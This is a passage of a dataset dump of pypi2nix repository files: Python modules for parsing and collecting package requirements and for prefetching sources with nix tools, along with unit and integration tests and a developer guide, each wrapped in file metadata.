requirements_file_check(self, content):\n self.assertIn(REVISION, content)\n" }, { "alpha_fraction": 0.6387625336647034, "alphanum_fraction": 0.6414922475814819, "avg_line_length": 28.70270347595215, "blob_id": 
"fad54abd0ffafc09811e13bfbdfdd2d75b3075f3", "content_id": "1af77dd83f21d0dd3158a3a78664f63f6db4417b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1099, "license_type": "no_license", "max_line_length": 80, "num_lines": 37, "path": "/src/pypi2nix/requirement_parser.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import no_type_check\n\nimport parsley\n\nfrom pypi2nix.requirement_parser_grammar import requirement_parser_grammar\nfrom pypi2nix.requirements import Logger\nfrom pypi2nix.requirements import Requirement\n\n\nclass ParsingFailed(Exception):\n def __init__(self, reason: str) -> None:\n self.reason = reason\n\n def __str__(self) -> str:\n return self.reason\n\n\nclass RequirementParser:\n def __init__(self, logger: Logger) -> None:\n self._compiled_grammar = None\n self.logger = logger\n\n @no_type_check\n def compiled_grammar(self):\n with requirement_parser_grammar(self.logger) as grammar:\n return grammar\n\n def parse(self, line: str) -> Requirement:\n line = line.strip()\n if \"\\n\" in line:\n raise ParsingFailed(\n \"Failed to parse requirement from string `{}`\".format(line)\n )\n try:\n return self.compiled_grammar()(line).specification() # type: ignore\n except parsley.ParseError as e:\n raise ParsingFailed(\"{message}\".format(message=e.formatError()))\n" }, { "alpha_fraction": 0.647216260433197, "alphanum_fraction": 0.6498929262161255, "avg_line_length": 38.74468231201172, "blob_id": "4814b6070cf71e2c32e270e1acecb3582b45d504", "content_id": "cac682a69282fedd137df37c373d9c3800a67b48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1868, "license_type": "no_license", "max_line_length": 86, "num_lines": 47, "path": "/src/pypi2nix/package/setupcfg.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Optional\n\nfrom setuptools.config import read_configuration\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.requirement_parser import ParsingFailed\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom .interfaces import HasBuildDependencies\n\n\nclass SetupCfg(HasBuildDependencies):\n def __init__(\n self,\n setup_cfg_path: str,\n logger: Logger,\n requirement_parser: RequirementParser,\n ):\n self.setup_cfg_path = setup_cfg_path\n self.setup_cfg = read_configuration(setup_cfg_path)\n self.logger = logger\n self.requirement_parser = requirement_parser\n\n def build_dependencies(self, target_platform: TargetPlatform) -> RequirementSet:\n setup_requires = self.setup_cfg.get(\"options\", {}).get(\"setup_requires\")\n requirements = RequirementSet(target_platform)\n if isinstance(setup_requires, str):\n requirements.add(self.requirement_parser.parse(setup_requires))\n elif isinstance(setup_requires, list):\n for requirement_string in setup_requires:\n try:\n requirement = self.requirement_parser.parse(requirement_string)\n except ParsingFailed as e:\n self.logger.warning(\n f\"Failed to parse build dependency of `{self.setup_cfg_path}`\"\n )\n self.logger.warning(f\"Possible reason: `{e.reason}`\")\n else:\n if requirement.applies_to_target(target_platform):\n requirements.add(requirement)\n return requirements\n\n @property\n def name(self) -> Optional[str]:\n return self.setup_cfg.get(\"metadata\", {}).get(\"name\", None) # type: ignore\n" }, { "alpha_fraction": 
0.7685009241104126, "alphanum_fraction": 0.777988612651825, "avg_line_length": 42.91666793823242, "blob_id": "8d0cf69078e2ef29bc8c9ab03b923a65f4734eed", "content_id": "a91e50375c06e52a682ffa3d738be4bc41c40e6a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 527, "license_type": "permissive", "max_line_length": 85, "num_lines": 12, "path": "/unittests/regression/test_issue_394.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "# https://github.com/nix-community/pypi2nix/issues/394\nfrom pypi2nix.requirement_parser import RequirementParser\n\n\ndef test_can_parse_requirements_with_comments(requirement_parser: RequirementParser):\n requirement = requirement_parser.parse(\"requirement # comment\")\n assert requirement.name() == \"requirement\"\n\n\ndef test_can_parse_given_test_case_from_issue(requirement_parser: RequirementParser):\n requirement = requirement_parser.parse(\"aioredis # my favourite package\")\n assert requirement.name() == \"aioredis\"\n" }, { "alpha_fraction": 0.5581395626068115, "alphanum_fraction": 0.5581395626068115, "avg_line_length": 31.25, "blob_id": "067c886a0c3e7530670997347fdaf6b87effe1eb", "content_id": "46e6b2c6204e363fb60072721ee8fda9ef9fc14d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "no_license", "max_line_length": 44, "num_lines": 4, "path": "/src/pypi2nix/pip/exceptions.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "class PipFailed(Exception):\n def __init__(self, output: str) -> None:\n self.output = output\n super().__init__()\n" }, { "alpha_fraction": 0.7417538166046143, "alphanum_fraction": 0.745776355266571, "avg_line_length": 27.9069766998291, "blob_id": "655a0099271a53e2b3f71818eeb4d584131b525a", "content_id": "f2e9c164198e685d7d29cf8d19a22d800bf66871", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1243, "license_type": "permissive", "max_line_length": 84, "num_lines": 43, "path": "/unittests/pip/test_download.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nfrom typing import List\n\nfrom pypi2nix.path import Path\nfrom pypi2nix.pip import Pip\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom ..switches import nix\n\n\ndef list_files(dirname: str) -> List[str]:\n return [\n candidate\n for candidate in os.listdir(dirname)\n if os.path.isfile(os.path.join(dirname, candidate))\n ]\n\n\n@nix\ndef test_pip_downloads_sources_to_target_directory(\n pip: Pip,\n project_dir: str,\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n):\n download_path = Path(project_dir) / \"download\"\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"six\"))\n pip.download_sources(requirements=requirements, target_directory=download_path)\n assert download_path.list_files()\n\n\n@nix\ndef test_pip_downloads_nothing_when_no_requirements_are_given(\n pip: Pip, download_dir: Path, current_platform: TargetPlatform\n):\n pip.download_sources(\n requirements=RequirementSet(current_platform), target_directory=download_dir\n )\n assert not download_dir.list_files()\n" }, { "alpha_fraction": 0.6346153616905212, "alphanum_fraction": 0.6682692170143127, "avg_line_length": 
22.11111068725586, "blob_id": "c67e6fc891ab379f29d7873da13fa7ccc68c8d7c", "content_id": "ea1c9a26cd2b6e28955d6993a98152731536c743", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 208, "license_type": "no_license", "max_line_length": 38, "num_lines": 9, "path": "/integrationtests/test_serpy_0_1_1.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass SerpyTestCase(IntegrationTest):\n name_of_testcase = \"serpy\"\n requirements = [\"serpy==0.1.1\"]\n\n def setup_requires(self):\n return [\"six==1.12.0\"]\n" }, { "alpha_fraction": 0.6763975024223328, "alphanum_fraction": 0.6795030832290649, "avg_line_length": 37.79518127441406, "blob_id": "5128bdec8fe2887b97a2a7dc358f598364580b9a", "content_id": "10bc04caef419b92b0df3eb0b622e696a14bcebd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3220, "license_type": "no_license", "max_line_length": 93, "num_lines": 83, "path": "/src/pypi2nix/requirements_collector.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "\"\"\"This module implements a class to collect requirements from command line arguments\ngiven to pypi2nix\n\"\"\"\n\nimport os.path\n\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.package_source import PathSource\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.requirements import PathRequirement\nfrom pypi2nix.requirements_file import RequirementsFile\nfrom pypi2nix.sources import Sources\nfrom pypi2nix.target_platform import TargetPlatform\n\n\nclass RequirementsCollector:\n def __init__(\n self,\n platform: TargetPlatform,\n requirement_parser: RequirementParser,\n logger: Logger,\n project_directory: str,\n base_dependency_graph: DependencyGraph,\n ):\n self.platform = platform\n self.requirement_set = RequirementSet(platform)\n self.requirement_parser = requirement_parser\n self.logger = logger\n self._project_directory = project_directory\n self._sources = Sources()\n self._base_dependency_graph = base_dependency_graph\n\n def requirements(self) -> RequirementSet:\n return self.requirement_set\n\n def add_line(self, line: str) -> None:\n original_dependency = self.requirement_parser.parse(line)\n transitive_requirements = self._base_dependency_graph.get_all_build_dependency_names(\n original_dependency\n )\n self._add_line_without_dependency_check(line)\n for requirement in transitive_requirements:\n self._add_line_without_dependency_check(requirement)\n\n def add_file(self, file_path: str) -> None:\n requirements_file = RequirementsFile(\n file_path, self._project_directory, self.requirement_parser, self.logger\n )\n requirements_file.process()\n self._sources.update(requirements_file.sources())\n added_requirements = RequirementSet.from_file(\n requirements_file, self.platform, self.requirement_parser, self.logger\n )\n transitive_requirements = set()\n for requirement in added_requirements:\n transitive_requirements.update(\n self._base_dependency_graph.get_all_build_dependency_names(requirement)\n )\n for line in transitive_requirements:\n self._add_line_without_dependency_check(line)\n self.requirement_set += added_requirements\n\n def sources(self) -> Sources:\n sources = Sources()\n sources.update(self.requirement_set.sources())\n sources.update(self._sources)\n return sources\n\n def 
_add_line_without_dependency_check(self, line: str) -> None:\n requirement = self.requirement_parser.parse(line)\n if isinstance(requirement, PathRequirement):\n requirement = requirement.change_path(\n lambda path: self._handle_requirements_path(\n name=requirement.name(), path=path\n )\n )\n self.requirement_set.add(requirement)\n\n def _handle_requirements_path(self, name: str, path: str) -> str:\n self._sources.add(name, PathSource(path))\n return os.path.abspath(path)\n" }, { "alpha_fraction": 0.7133640646934509, "alphanum_fraction": 0.7152073979377747, "avg_line_length": 36.41379165649414, "blob_id": "3a9627e583ba955efe1731c02528bc57e94f6a42", "content_id": "be418e3a314c129692d48f4c60b843c4ae5d5c55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1085, "license_type": "no_license", "max_line_length": 95, "num_lines": 29, "path": "/src/pypi2nix/external_dependency_collector/collector.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from copy import copy\nfrom typing import Set\n\nfrom pypi2nix.external_dependencies import ExternalDependency\nfrom pypi2nix.requirement_set import RequirementSet\n\nfrom .lookup import RequirementDependencyRetriever\n\n\nclass ExternalDependencyCollector:\n def __init__(\n self, requirement_dependency_retriever: RequirementDependencyRetriever\n ) -> None:\n self._external_dependencies: Set[ExternalDependency] = set()\n self._requirement_dependency_retriever = requirement_dependency_retriever\n\n def collect_explicit(self, attribute_name: str) -> None:\n self._external_dependencies.add(ExternalDependency(attribute_name))\n\n def collect_from_requirements(self, requirements: RequirementSet) -> None:\n for requirement in requirements:\n self._external_dependencies.update(\n self._requirement_dependency_retriever.get_external_dependency_for_requirement(\n requirement\n )\n )\n\n def get_collected(self) -> Set[ExternalDependency]:\n return copy(self._external_dependencies)\n" }, { "alpha_fraction": 0.7724867463111877, "alphanum_fraction": 0.7883597612380981, "avg_line_length": 7.217391490936279, "blob_id": "9630873997882503d31270823e91f8bd53fb3c69", "content_id": "c0774d6fa1b90cf80e0e721eab12cab75c8701d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 189, "license_type": "no_license", "max_line_length": 23, "num_lines": 23, "path": "/requirements-dev.txt", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "# linting\nblack\nflake8\nflake8-debugger\nflake8-unused-arguments\nmypy\nisort\n\n# testing\npytest\npytest-cov\n\n# develop\npdbpp\n\n# packaging\ntwine\nbumpv\n\n# documentation\nsphinx\n\n-c constraints.txt\n" }, { "alpha_fraction": 0.6292657852172852, "alphanum_fraction": 0.6313340067863464, "avg_line_length": 35.49056625366211, "blob_id": "3fd7d30598015c39f4d6699d1520133909fd906a", "content_id": "25d15bfda56db9e336c9c8c790105488e3ed3126", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1934, "license_type": "no_license", "max_line_length": 98, "num_lines": 53, "path": "/scripts/build_wheel.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport shlex\nimport shutil\nimport sys\nimport tempfile\n\nfrom pypi2nix.logger import StreamLogger\nfrom pypi2nix.nix import Nix\nfrom pypi2nix.requirement_parser import ParsingFailed\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom 
repository import ROOT\n\nHERE = os.path.abspath(os.path.dirname(__file__))\nDERIVATION_PATH = os.path.join(HERE, \"build-pip.nix\")\n\n\ndef build_wheel(target_directory: str, requirement: str) -> str:\n logger = StreamLogger(sys.stdout)\n requirement_parser = RequirementParser(logger=logger)\n package_directory = os.path.join(ROOT, \"unittests\", \"data\")\n escaped_requirement = shlex.quote(requirement)\n target_directory = os.path.abspath(target_directory)\n with tempfile.TemporaryDirectory() as build_directory:\n os.chdir(build_directory)\n nix = Nix(logger=logger)\n nix.shell(\n command=f\"pip wheel {escaped_requirement} --find-links {package_directory} --no-deps\",\n derivation_path=DERIVATION_PATH,\n nix_arguments=dict(),\n )\n try:\n parsed_requirement = requirement_parser.parse(requirement)\n except ParsingFailed:\n for path in os.listdir(\".\"):\n if path.endswith(\".whl\"):\n wheel_path = path\n break\n else:\n raise Exception(\"Build process did not produce .whl file\")\n else:\n for path in os.listdir(\".\"):\n if path.endswith(\".whl\") and parsed_requirement.name() in path:\n wheel_path = path\n break\n else:\n raise Exception(\"Build process did not produce .whl file\")\n\n target_file_name = os.path.basename(wheel_path)\n target_path = os.path.join(target_directory, target_file_name)\n shutil.move(wheel_path, target_path)\n return target_file_name\n" }, { "alpha_fraction": 0.7221835255622864, "alphanum_fraction": 0.7245063781738281, "avg_line_length": 33.439998626708984, "blob_id": "a85f557ac9c74746ebcb3b416d3b995da358e5c4", "content_id": "ac8c0318499d23a0342b369edd720bfaa298c61a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4305, "license_type": "permissive", "max_line_length": 92, "num_lines": 125, "path": "/unittests/test_requirement_collector.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nimport pathlib\nfrom contextlib import contextmanager\nfrom typing import Any\nfrom typing import Generator\n\nimport pytest\n\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.package_source import PathSource\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirements import PathRequirement\nfrom pypi2nix.requirements_collector import RequirementsCollector\nfrom pypi2nix.target_platform import TargetPlatform\n\n\n@contextmanager\ndef current_working_directory(dir: str) -> Generator[None, None, None]:\n current = os.getcwd()\n try:\n os.chdir(dir)\n yield\n finally:\n os.chdir(current)\n\n\n@pytest.fixture\ndef collector(\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n logger: Logger,\n project_dir: str,\n) -> RequirementsCollector:\n return RequirementsCollector(\n current_platform, requirement_parser, logger, project_dir, DependencyGraph()\n )\n\n\ndef test_that_we_can_generate_an_empty_requirement_set_from_freshly_constructed_collector(\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n logger: Logger,\n project_dir: str,\n) -> None:\n collector = RequirementsCollector(\n current_platform, requirement_parser, logger, project_dir, DependencyGraph()\n )\n requirements = collector.requirements()\n assert len(requirements) == 0\n\n\ndef test_that_we_can_add_command_line_requirements_by_name(\n collector: RequirementsCollector,\n) -> None:\n collector.add_line(\"pytest\")\n requirements = collector.requirements()\n assert 
\"pytest\" in requirements\n\n\ndef test_that_we_can_add_a_requirements_file_path(\n collector: RequirementsCollector, tmpdir: pathlib.Path\n) -> None:\n requirements_txt = tmpdir / \"requirements.txt\"\n requirements_lines = [\"pytest\", \"flake8\"]\n with open(requirements_txt, \"w\") as f:\n for requirement in requirements_lines:\n print(requirement, file=f)\n collector.add_file(str(requirements_txt))\n assert \"pytest\" in collector.requirements()\n assert \"flake8\" in collector.requirements()\n\n\ndef test_that_requirements_with_relative_paths_are_absolute_paths_after_adding(\n collector: RequirementsCollector,\n) -> None:\n collector.add_line(\"./path/to/egg#egg=testegg\")\n requirement = collector.requirements().get(\"testegg\")\n assert isinstance(requirement, PathRequirement)\n assert os.path.isabs(requirement.path())\n\n\ndef test_that_sources_can_be_extracted_from_a_collector(\n collector: RequirementsCollector,\n) -> None:\n collector.add_line(\"path/to/egg#egg=testegg\")\n assert \"testegg\" in collector.sources()\n\n\ndef test_that_relative_paths_are_preserved_in_sources(\n collector: RequirementsCollector,\n) -> None:\n collector.add_line(\"path/to/egg#egg=testegg\")\n testegg_source = collector.sources()[\"testegg\"]\n assert isinstance(testegg_source, PathSource)\n assert testegg_source.path == \"path/to/egg\"\n\n\ndef test_that_path_paths_from_requirement_files_are_preserved_in_sources(\n collector: RequirementsCollector, tmpdir: Any\n) -> None:\n with current_working_directory(str(tmpdir)):\n requirements_file_path = tmpdir.join(\"requirements.txt\")\n with open(requirements_file_path, \"w\") as f:\n print(\"path/to/egg#egg=testegg\", file=f)\n collector.add_file(str(requirements_file_path))\n testegg_source = collector.sources()[\"testegg\"]\n assert isinstance(testegg_source, PathSource)\n assert testegg_source.path == \"path/to/egg\"\n\n\ndef test_that_path_sources_from_requirement_files_are_preserved_in_sources_relative_to_file(\n collector: RequirementsCollector, tmpdir: Any\n) -> None:\n with current_working_directory(str(tmpdir)):\n requirements_directory = tmpdir.join(\"directory\")\n requirements_directory.mkdir()\n requirements_file_path = requirements_directory.join(\"requirements.txt\")\n with open(requirements_file_path, \"w\") as f:\n print(\"path/to/egg#egg=testegg\", file=f)\n collector.add_file(str(requirements_file_path))\n testegg_source = collector.sources()[\"testegg\"]\n assert isinstance(testegg_source, PathSource)\n assert testegg_source.path == \"directory/path/to/egg\"\n" }, { "alpha_fraction": 0.6402966380119324, "alphanum_fraction": 0.6427688598632812, "avg_line_length": 21.47222137451172, "blob_id": "113d58af31b7440a4df828bc4b2d14a6a26eb6e3", "content_id": "4ca09faea38dabd8b82c17443bc7456f7c40dbd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 809, "license_type": "no_license", "max_line_length": 66, "num_lines": 36, "path": "/src/pypi2nix/pip/interface.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from abc import ABCMeta\nfrom abc import abstractmethod\nfrom typing import List\n\nfrom pypi2nix.path import Path\nfrom pypi2nix.requirement_set import RequirementSet\n\n\nclass Pip(metaclass=ABCMeta):\n @abstractmethod\n def download_sources(\n self, requirements: RequirementSet, target_directory: Path\n ) -> None:\n pass\n\n @abstractmethod\n def build_wheels(\n self,\n requirements: RequirementSet,\n target_directory: Path,\n source_directories: List[Path],\n 
) -> None:\n pass\n\n @abstractmethod\n def install(\n self,\n requirements: RequirementSet,\n source_directories: List[Path],\n target_directory: Path,\n ) -> None:\n pass\n\n @abstractmethod\n def freeze(self, python_path: List[Path]) -> str:\n pass\n" }, { "alpha_fraction": 0.5799742341041565, "alphanum_fraction": 0.5812626481056213, "avg_line_length": 30.587209701538086, "blob_id": "4e82e2ffe09fbd642483194ae5652257c59c08f9", "content_id": "b75c83a7ff18e19ba5931f64dbbf2530539398b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5433, "license_type": "no_license", "max_line_length": 88, "num_lines": 172, "path": "/src/pypi2nix/utils.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import json\nimport os\nimport shlex\nimport subprocess\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\nimport click\nfrom nix_prefetch_github import nix_prefetch_github\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.path import Path\n\nNixOption = Union[str, List[str], bool, Path, List[Path]]\n\nHERE = os.path.dirname(__file__)\n\n\ndef pretty_option(option: Optional[str]) -> str:\n if option is None:\n return \"\"\n else:\n return \" [value: {}]\".format(\n type(option) in [list, tuple] and \" \".join(option) or option\n )\n\n\ndef cmd(\n command: Union[str, List[str]],\n logger: Logger,\n stderr: Optional[int] = None,\n cwd: Optional[str] = None,\n) -> Tuple[int, str]:\n if isinstance(command, str):\n command = shlex.split(command)\n\n logger.debug(\"|-> \" + \" \".join(map(shlex.quote, command)))\n\n p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=stderr, cwd=cwd)\n\n try:\n out = []\n while True:\n line = p.stdout.readline().decode()\n if line == \"\" and p.poll() is not None:\n break\n if line != \"\":\n logger.debug(\" \" + line.rstrip(\"\\n\"))\n out.append(line)\n except Exception:\n p.kill()\n raise\n else:\n p.communicate()\n return p.returncode, \"\".join(out)\n\n\ndef create_command_options(options: Dict[str, NixOption],) -> List[str]:\n command_options = []\n for name, value in options.items():\n if isinstance(value, (str, Path)):\n command_options.append(\"--argstr\")\n command_options.append(name)\n command_options.append(str(value))\n elif isinstance(value, list) or isinstance(value, tuple):\n value = \"[ %s ]\" % (\" \".join(['\"%s\"' % x for x in value]))\n command_options.append(\"--arg\")\n command_options.append(name)\n command_options.append(value)\n elif isinstance(value, bool):\n command_options.append(\"--arg\")\n command_options.append(name)\n command_options.append(\"true\" if value else \"false\")\n return command_options\n\n\ndef args_as_list(inputs: List[str]) -> List[str]:\n return list(filter(lambda x: x != \"\", (\" \".join(inputs)).split(\" \")))\n\n\ndef prefetch_git(url: str, rev: Optional[str] = None) -> Dict[str, str]:\n command = [\"nix-prefetch-git\", url]\n\n if rev is not None:\n command += [\"--rev\", rev]\n try:\n completed_proc = subprocess.run(\n command,\n universal_newlines=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n except FileNotFoundError:\n raise click.ClickException(\n \"Could not find executable `nix-prefetch-git`. 
\"\n \"Make sure it is installed correctly and available in \"\n \"$PATH.\"\n )\n\n returncode = completed_proc.returncode\n\n if returncode != 0:\n raise click.ClickException(\n (\n \"Could not fetch git repository at {url}, git returncode was \"\n \"{code}. stdout:\\n{stdout}\\nstderr:\\n{stderr}\"\n ).format(\n url=url,\n code=returncode,\n stdout=completed_proc.stdout,\n stderr=completed_proc.stderr,\n )\n )\n repo_data = json.loads(completed_proc.stdout)\n return repo_data # type: ignore\n\n\ndef prefetch_hg(url: str, logger: Logger, rev: Optional[str] = None) -> Dict[str, str]:\n command = [\"nix-prefetch-hg\", url] + ([rev] if rev else [])\n return_code, output = cmd(command, logger, stderr=subprocess.STDOUT)\n if return_code != 0:\n raise click.ClickException(\n \" \".join(\n [\n \"Could not fetch hg repository at {url}, returncode was {code}.\"\n \"output:\\n {output}\"\n ]\n ).format(url=url, code=return_code, output=output)\n )\n HASH_PREFIX = \"hash is \"\n REV_PREFIX = \"hg revision is \"\n hash_value = None\n revision = None\n for output_line in output.splitlines():\n output_line = output_line.strip()\n if output_line.startswith(HASH_PREFIX):\n hash_value = output_line[len(HASH_PREFIX) :].strip()\n elif output_line.startswith(REV_PREFIX):\n revision = output_line[len(REV_PREFIX) :].strip()\n\n if hash_value is None:\n raise click.ClickException(\n \"Could not determine the hash from ouput:\\n{output}\".format(output=output)\n )\n if revision is None:\n raise click.ClickException(\n \"Could not determine the revision from ouput:\\n{output}\".format(\n output=output\n )\n )\n return {\"sha256\": hash_value, \"revision\": revision}\n\n\ndef prefetch_github(owner: str, repo: str, rev: Optional[str] = None) -> Dict[str, str]:\n return nix_prefetch_github(owner, repo, rev=rev)\n\n\ndef escape_double_quotes(text: str) -> str:\n return text.replace('\"', '\\\\\"')\n\n\ndef prefetch_url(url: str, logger: Logger, name: Optional[str] = None) -> str:\n command = [\"nix-prefetch-url\", url]\n if name is not None:\n command += [\"--name\", name]\n returncode, output = cmd(command, logger, stderr=subprocess.DEVNULL)\n if not output:\n raise ValueError(f\"Could not fetch ressource from {url}\")\n return output.rstrip()\n" }, { "alpha_fraction": 0.7268907427787781, "alphanum_fraction": 0.7333548665046692, "avg_line_length": 37.197532653808594, "blob_id": "0c02e8770c3e7a997443c3bcb9f7885d411b476e", "content_id": "e4b1d21e1cea1651e04df59bd2258e34551c94e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3101, "license_type": "no_license", "max_line_length": 70, "num_lines": 81, "path": "/source/development.rst", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "Help developing pypi2nix\n------------------------\n\nClone `pypi2nix repository`_ and using the ``nix-shell`` command enter\ndevelopment environment.::\n\n % git clone https://github.com/nix-community/pypi2nix\n % cd pypi2nix\n % nix-shell\n\nCode is located in ``src/pypi2nix``.\n\nTesting\n^^^^^^^\n\nPypi2nix comes with two kinds of tests: unit tests and integration\ntests. They can be found in the folders ``/unittests`` and\n``/integrationtests`` respectively.\n\nUnit tests are straight forward. They are run via `pytest`_ and (try\nto) follow `pytest`_ best practices. Idealy all of pypi2nix's code\nshould be covered by unittests. If possible unittests should not go\nonline and fetch data from the internet. 
If this cannot be avoided\nuse the ``@nix`` decorator, found in ``unittests.switches`` to mark\ntests that require network access.\n\nIntegration tests\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\nIntegration tests are a little bit more involved. We implemented a\nsmall framework to write new tests and maintain old ones. Check out\n``integrationtests.framework`` for information on how to write custom\nintegration tests. To run all integration tests run\n``run_integration_tests.py`` from the ``scripts`` directory. If you\nuse ``nix-shell`` to create your development environment then the\n``scripts`` directory should be in you ``PATH`` variable.\n\nPlease note that all integration test cases are classes deriving from\n``integrationtests.framework.IntegrationTest``. Also all these tests\nmust end with ``TestCase``, e.g. ``MyCustomTestCase``.\n\nMaintainance scripts\n^^^^^^^^^^^^^^^^^^^^\n\nThe ``scripts`` folder contains programs that help to maintain the\nrepository. We expect the user to have all the packages from the\nbuild environment of pypi2nix installed. We register the ``scripts``\ndirectory in the users ``PATH`` if they choose to enter ``nix-shell``\nin the top level directory of this project. All maintainance scripts\nshould offer a list of legal command line arguments via the ``--help``\nflag.\n\nVersion bumping\n^^^^^^^^^^^^^^^\n\nWe use ``bumpv`` to manage the current version of this project. This\nprogram should be part of the development environment.\n\nCode formatting\n^^^^^^^^^^^^^^^\n\nWe try to automate as much code formatting as possible. For python\nsource code we use ``black`` and ``isort``. For nix source code we\nuse ``nixfmt``. Both tools are available in development environment\nprovided by ``nix-shell``. The continous integration system will\ncomplain if the code is not formatted properly and the package won't\nbuild. You can automatically format all code via the\n``format_sources.py`` program. You can run it like any other\nmaintainance script from any working directory you like as long as you\nare inside the provided ``nix-shell`` environment. Example::\n\n [nix-shell:~/src/pypi2nix]$ format_sources.py\n Skipped 2 files\n All done! ✨ 🍰 ✨\n 131 files left unchanged.\n Success: no issues found in 47 source files\n Success: no issues found in 122 source files\n\n\n.. _`pytest`: https://pytest.org\n.. 
_`pypi2nix repository`: https://github.com/nix-community/pypi2nix\n" }, { "alpha_fraction": 0.7258612513542175, "alphanum_fraction": 0.7345948815345764, "avg_line_length": 30.707693099975586, "blob_id": "45f5224191917939ae37e675efa0872873fff93a", "content_id": "e2ccbd5b43abf422b82db19c32e85e8002b78795", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2061, "license_type": "permissive", "max_line_length": 85, "num_lines": 65, "path": "/unittests/test_wheel_builder.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import List\n\nimport pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.metadata_fetcher import MetadataFetcher\nfrom pypi2nix.pypi import Pypi\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.sources import Sources\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.wheel import Wheel\nfrom pypi2nix.wheel_builder import WheelBuilder\n\nfrom .switches import nix\n\n\n@pytest.fixture\ndef build_wheels(\n wheel_builder: WheelBuilder,\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n logger: Logger,\n sources_for_test_packages: Sources,\n pypi: Pypi,\n):\n def wrapper(requirement_lines: List[str]) -> List[Wheel]:\n requirements = RequirementSet(current_platform)\n for line in requirement_lines:\n requirements.add(requirement_parser.parse(line))\n wheel_paths = wheel_builder.build(requirements)\n metadata_fetcher = MetadataFetcher(\n sources_for_test_packages, logger, requirement_parser, pypi\n )\n return metadata_fetcher.main(\n wheel_paths, current_platform, wheel_builder.source_distributions\n )\n\n return wrapper\n\n\n@nix\ndef test_extracts_myextra_dependencies_from_package3(build_wheels,):\n wheels = build_wheels([\"package3[myextra]\"])\n assert [wheel for wheel in wheels if wheel.name == \"package1\"]\n\n\n@nix\ndef test_does_not_package_myextra_dependencies_if_no_extras_specified(build_wheels,):\n wheels = build_wheels([\"package3\"])\n assert not [wheel for wheel in wheels if wheel.name == \"package1\"]\n\n\n@nix\ndef test_does_detect_extra_requirements_from_requirements(build_wheels):\n wheels = build_wheels([\"package4\"])\n assert [wheel for wheel in wheels if wheel.name == \"package1\"]\n\n\n@nix\ndef test_that_we_filter_extra_requirements_that_do_not_apply_to_target_platform(\n build_wheels,\n):\n wheels = build_wheels([\"package3[other_platform]\"])\n assert not [wheel for wheel in wheels if wheel.name == \"package2\"]\n" }, { "alpha_fraction": 0.6677631735801697, "alphanum_fraction": 